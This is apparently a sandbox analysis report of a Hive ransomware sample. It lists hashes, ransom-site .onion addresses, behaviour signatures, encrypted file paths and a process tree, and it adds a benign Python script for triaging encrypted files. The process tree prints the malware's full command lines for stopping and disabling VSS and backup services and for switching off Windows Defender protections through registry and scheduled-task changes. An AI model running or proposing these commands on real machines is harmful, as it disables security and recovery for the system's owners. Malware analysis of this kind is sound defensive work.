Analysis
Max time kernel: 126s
Max time network: 133s
Platform: windows7_x64
Resource: win7-en-20211208
Submitted: 12-01-2022 14:34

Static task: static1
Behavioral task: behavioral1
Sample: afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
Resource: win7-en-20211208
General
Target: afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
Size: 3.8MB
MD5: 3ef03bfba1665597a824e136fad174de
SHA1: b0e02886ca9c7edce20380934f78fa8e5bb931b9
SHA256: afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8
SHA512: 3773754a433e885db06484ce9b4a4ff3936de153f2954c0c4c4487148fa28f8947ec2eef756f09b408fb1ca3472d8798757ee418a1e5a671ef3a0a924c364309
Malware Config
Extracted
Ransom note: C:\Program Files\7-Zip\wPfq_HOW_TO_DECRYPT.txt
Family: hive
URLs:
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures

Deletes Windows Defender Definitions (2 TTPs, 1 IoC)
Uses the MpCmdRun utility to delete all AV definitions.
Processes:
  PID 1328  MpCmdRun.exe

Hive
A ransomware written in Golang first seen in June 2021.

Modifies security service (2 TTPs, 1 IoC)
Processes:
  reg.exe  Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" (4 = SERVICE_DISABLED, so the Defender service will not start on the next boot)

Clears Windows event logs (1 TTP)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
Processes:
  PID 1680  bcdedit.exe
  PID 1648  bcdedit.exe

Modifies extensions of user files (8 IoCs)
Ransomware generally changes the extension on encrypted files.
Process: afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
  File renamed  C:\Users\Admin\Pictures\CopySkip.png => C:\Users\Admin\Pictures\CopySkip.png.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Users\Admin\Pictures\CopySkip.png.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File renamed  C:\Users\Admin\Pictures\ExitExport.tif => C:\Users\Admin\Pictures\ExitExport.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Users\Admin\Pictures\ExitExport.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File renamed  C:\Users\Admin\Pictures\PopInitialize.tiff => C:\Users\Admin\Pictures\PopInitialize.tiff.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Users\Admin\Pictures\PopInitialize.tiff.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File renamed  C:\Users\Admin\Pictures\RequestClear.tif => C:\Users\Admin\Pictures\RequestClear.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Users\Admin\Pictures\RequestClear.tif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
Process: afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
Encrypted files carry the same token-plus-.vl6ia suffix seen under user files; files listed without it were opened for modification with no rename recorded. The ransom note wPfq_HOW_TO_DECRYPT.txt is dropped into directories as they are processed.
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\feature.xml.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.ja_5.5.0.165303.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\America\Adak.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\Pacific\Midway.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_hail.png
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.properties.src.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HTECH_01.MID.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File created  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\wPfq_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\es-ES\css\calendar.css
  File opened for modification  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18218_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTORE_COL.HXC.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Maroon.css.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL083.XML.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files\DVD Maker\Shared\DvdStyles\rectangle_photo_Thumbnail.bmp
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_zh_4.4.0.v20140623020002.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui
  File opened for modification  C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.swf.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Internet Explorer\en-US\iedvtool.dll.mui
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf.nl_ja_4.4.0.v20140623020002.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD15072_.GIF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\EnterRename.ppt.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\America\Indiana\Indianapolis.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_cloudy.png
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00640_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SCHDCNCL.CFG.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Common Files\System\msadc\fr-FR\msadcor.dll.mui
  File opened for modification  C:\Program Files\DVD Maker\bod_r.TTF
  File created  C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\wPfq_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD10256_.GIF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Library\EUROTOOL.XLAM.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0281243.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0284916.JPG.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File created  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\wPfq_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\UndoPush.pot.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\calendar.html
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00462_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_windy.png
  File created  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\wPfq_HOW_TO_DECRYPT.txt
  File opened for modification  C:\Program Files\Common Files\Microsoft Shared\ink\pl-PL\tipresx.dll.mui
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Brisbane.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty.png
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02228_.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Beige.css.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN044.XML.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs_5.5.0.165303.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099146.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187881.WMF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_foggy.png
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Things\COUPLER.WAV.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WSIDBR98.POC.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Templates\1033\ExecutiveMergeLetter.dotx.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\booklist.gif.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01740_.GIF.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Microsoft Office\Templates\1033\AdjacencyReport.dotx.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files\Internet Explorer\en-US\F12Tools.dll.mui
  File opened for modification  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bishkek.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia
  File opened for modification  C:\Program Files (x86)\Common Files\System\msadc\de-DE\msadcor.dll.mui
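The two file-system sections above (user files renamed with a token-plus-.vl6ia suffix, and Program Files entries mixed with dropped wPfq_HOW_TO_DECRYPT.txt notes) are what an incident responder has to turn into numbers: how many files were encrypted, of which types, where notes were dropped, and what the original names were. The Python below is an added example, not code from the sandbox or from the malware. It treats the 56-character token as opaque (the page does not decode it), and the length window for the token and the <four characters>_HOW_TO_DECRYPT.txt note pattern are assumptions generalised from the paths in this report. The sample paths are constructed from entries above.

```python
import re
from collections import Counter
from pathlib import PureWindowsPath

# Naming observed in this report: <original name>.<token>.vl6ia. The token is a
# URL-safe-base64-looking string (56 characters here) whose meaning the page does
# not document, so it is treated as opaque. The 40..80 length window and the
# ransom-note name pattern are assumptions generalised from the report's paths.
ENCRYPTED_NAME = re.compile(
    r"^(?P<orig>.+?)\.(?P<token>[A-Za-z0-9_-]{40,80})\.(?P<ext>vl6ia)$"
)
RANSOM_NOTE = re.compile(r"^[A-Za-z0-9]{4}_HOW_TO_DECRYPT\.txt$")


def classify(path: str) -> dict:
    """Classify one Windows path as 'encrypted', 'note' or 'other'.

    For encrypted files the pre-encryption path is reconstructed by stripping
    the token and the campaign extension from the file name.
    """
    p = PureWindowsPath(path)  # pure path: works on any OS, no filesystem access
    result = {"kind": "other", "path": path, "dir": str(p.parent),
              "original": None, "token": None}
    m = ENCRYPTED_NAME.match(p.name)
    if m:
        result.update(kind="encrypted", token=m["token"],
                      original=str(p.parent / m["orig"]))
    elif RANSOM_NOTE.match(p.name):
        result["kind"] = "note"
    return result


def summarize(paths) -> dict:
    """Aggregate per-file classifications into the figures an IR lead needs."""
    rows = [classify(p) for p in paths]
    encrypted = [r for r in rows if r["kind"] == "encrypted"]
    return {
        "counts": Counter(r["kind"] for r in rows),
        # Which file types were hit: suffix of the reconstructed original name.
        "original_suffixes": Counter(
            PureWindowsPath(r["original"]).suffix.lower() for r in encrypted),
        # Distinct token values; this report shows two tails (AAAAAAAAAAA0 / IAAAACAAAAA0).
        "tokens": Counter(r["token"] for r in encrypted),
        "note_dirs": sorted({r["dir"] for r in rows if r["kind"] == "note"}),
    }


# Constructed from entries in this report (not a complete list).
SAMPLE_PATHS = [
    r"C:\Users\Admin\Pictures\CopySkip.png.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia",
    r"C:\Users\Admin\Pictures\PopInitialize.tiff.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia",
    r"C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightRegular.ttf.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_IAAAACAAAAA0.vl6ia",
    r"C:\Program Files\EnterRename.ppt.SuYS56oSXCHKkbiIfpSQ31zsYfJfAKHlzYT8911_MCz_AAAAAAAAAAA0.vl6ia",
    r"C:\Program Files\7-Zip\wPfq_HOW_TO_DECRYPT.txt",
    r"C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\wPfq_HOW_TO_DECRYPT.txt",
    r"C:\Program Files\Windows Mail\de-DE\msoeres.dll.mui",
    r"C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\gadget.xml",
]

if __name__ == "__main__":
    for key, value in summarize(SAMPLE_PATHS).items():
        print(f"{key}: {value}")
```

On a real host the same functions can be fed the output of a recursive directory walk; because the original name is recovered from the file name alone, the summary also gives the list of paths to restore from backup once the encrypted copies are removed.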
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoC)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  PID 1356  vssadmin.exe

Opens file in notepad (likely ransom note) (1 IoC)
Processes:
  PID 2356  notepad.exe

Runs net.exe

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  PID 1380  powershell.exe
  PID 1940  powershell.exe
  PID 964   afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Privileges enabled on each process token. SeSecurityPrivilege and SeBackupPrivilege on the wevtutil.exe instances are what clearing or exporting the Security event log requires, which matches the "Clears Windows event logs" signature above. The wmic.exe entries show every privilege the token holds being enabled at once, which wmic does on startup regardless of the query it runs.
Processes:
  PID 1708  wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 1700  wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 552   wevtutil.exe: SeSecurityPrivilege, SeBackupPrivilege
  PID 1240  wmic.exe: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, and privilege LUIDs 33, 34, 35 (SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege, SeCreateSymbolicLinkPrivilege)
  PID 1192  wmic.exe: the same set as PID 1240, recorded twice; the second listing is cut off after LUID 33 by the 64-IoC cap

Suspicious use of WriteProcessMemory (64 IoCs)
Every write here goes from a parent into its own newly created child, so the list documents the spawn chain rather than injection into an unrelated process. Each pair was recorded three times; the last pair is cut off at the 64-IoC cap.
Processes:
  PID 964 (sample) -> PID 1520 net.exe
  PID 1520 net.exe -> PID 1912 net1.exe
  PID 964 (sample) -> PID 524 net.exe
  PID 524 net.exe -> PID 560 net1.exe
  PID 964 (sample) -> PID 668 net.exe
  PID 668 net.exe -> PID 1472 net1.exe
  PID 964 (sample) -> PID 784 net.exe
  PID 784 net.exe -> PID 1764 net1.exe
  PID 964 (sample) -> PID 1744 net.exe
  PID 1744 net.exe -> PID 1356 net1.exe
  PID 964 (sample) -> PID 1088 net.exe
  PID 1088 net.exe -> PID 1080 net1.exe
  PID 964 (sample) -> PID 1064 net.exe
  PID 1064 net.exe -> PID 1456 net1.exe
  PID 964 (sample) -> PID 1904 net.exe
  PID 1904 net.exe -> PID 1808 net1.exe
  PID 964 (sample) -> PID 1372 sc.exe
  PID 964 (sample) -> PID 1236 sc.exe
  PID 964 (sample) -> PID 2024 sc.exe
  PID 964 (sample) -> PID 1704 sc.exe
  PID 964 (sample) -> PID 1008 sc.exe
  PID 964 (sample) -> PID 2000 sc.exe (recorded once; list truncated)
Processes

The tree below reproduces only part of the run. Processes named in the signatures above (MpCmdRun.exe, vssadmin.exe, bcdedit.exe, wevtutil.exe, wmic.exe, powershell.exe, notepad.exe, ping.exe) were also spawned but fall outside the portion shown. Indentation gives the parent/child relationship; net.exe hands each request to a net1.exe child, so every "net stop" appears twice.

PID 964  C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe
         Command line: "C:\Users\Admin\AppData\Local\Temp\afd0699c284c7be7e993470198cf7a67c868cffcb39c1002a4611813d28cf0a8.bin.sample.exe"
         - Modifies extensions of user files
         - Drops file in Program Files directory
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory

  PID 1520  C:\Windows\system32\net.exe
            Command line: net.exe stop "NetMsmqActivator" /y
            - Suspicious use of WriteProcessMemory
    PID 1912  C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 stop "NetMsmqActivator" /y

  PID 524  C:\Windows\system32\net.exe
           Command line: net.exe stop "SamSs" /y
           - Suspicious use of WriteProcessMemory
    PID 560  C:\Windows\system32\net1.exe
             Command line: C:\Windows\system32\net1 stop "SamSs" /y

  PID 668  C:\Windows\system32\net.exe
           Command line: net.exe stop "SDRSVC" /y
           - Suspicious use of WriteProcessMemory
    PID 1472  C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 stop "SDRSVC" /y

  PID 784  C:\Windows\system32\net.exe
           Command line: net.exe stop "SstpSvc" /y
           - Suspicious use of WriteProcessMemory
    PID 1764  C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 stop "SstpSvc" /y

  PID 1744  C:\Windows\system32\net.exe
            Command line: net.exe stop "UI0Detect" /y
            - Suspicious use of WriteProcessMemory
    PID 1356  C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 stop "UI0Detect" /y

  PID 1088  C:\Windows\system32\net.exe
            Command line: net.exe stop "VSS" /y
            - Suspicious use of WriteProcessMemory
    PID 1080  C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 stop "VSS" /y

  PID 1064  C:\Windows\system32\net.exe
            Command line: net.exe stop "wbengine" /y
            - Suspicious use of WriteProcessMemory
    PID 1456  C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 stop "wbengine" /y

  PID 1904  C:\Windows\system32\net.exe
            Command line: net.exe stop "WebClient" /y
            - Suspicious use of WriteProcessMemory
    PID 1808  C:\Windows\system32\net1.exe
              Command line: C:\Windows\system32\net1 stop "WebClient" /y

  PID 1372  C:\Windows\system32\sc.exe
            Command line: sc.exe config "NetMsmqActivator" start= disabled
  PID 1236  C:\Windows\system32\sc.exe
            Command line: sc.exe config "SamSs" start= disabled
  PID 2024  C:\Windows\system32\sc.exe
            Command line: sc.exe config "SDRSVC" start= disabled
  PID 1704  C:\Windows\system32\sc.exe
            Command line: sc.exe config "SstpSvc" start= disabled
  PID 1008  C:\Windows\system32\sc.exe
            Command line: sc.exe config "UI0Detect" start= disabled
  PID 2000  C:\Windows\system32\sc.exe
            Command line: sc.exe config "VSS" start= disabled
  PID 1888  C:\Windows\system32\sc.exe
            Command line: sc.exe config "wbengine" start= disabled
  PID 916  C:\Windows\system32\sc.exe
           Command line: sc.exe config "WebClient" start= disabled

  PID 1244  C:\Windows\system32\reg.exe
            Command line: reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  PID 1600  C:\Windows\system32\reg.exe
            Command line: reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  PID 1280  C:\Windows\system32\reg.exe
            Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  PID 740  C:\Windows\system32\reg.exe
           Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  PID 560  C:\Windows\system32\reg.exe
           Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  PID 1248  C:\Windows\system32\reg.exe
            Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  PID 808  C:\Windows\system32\reg.exe
           Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  PID 1920  C:\Windows\system32\reg.exe
            Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  PID 588  C:\Windows\system32\reg.exe
           Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  PID 1108  C:\Windows\system32\reg.exe
            Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  PID 1456  C:\Windows\system32\reg.exe
            Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  PID 1864  C:\Windows\system32\reg.exe
            Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  PID 992  C:\Windows\system32\reg.exe
           Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  PID 1828  C:\Windows\system32\reg.exe
            Command line: reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  PID 1772  C:\Windows\system32\reg.exe
            Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  PID 1960  C:\Windows\system32\reg.exe
            Command line: reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

  PID 276  C:\Windows\system32\schtasks.exe
           Command line: schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  PID 308  C:\Windows\system32\schtasks.exe
           Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  PID 1668  C:\Windows\system32\schtasks.exe
            Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  PID 1768  C:\Windows\system32\schtasks.exe
            Command line: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
-
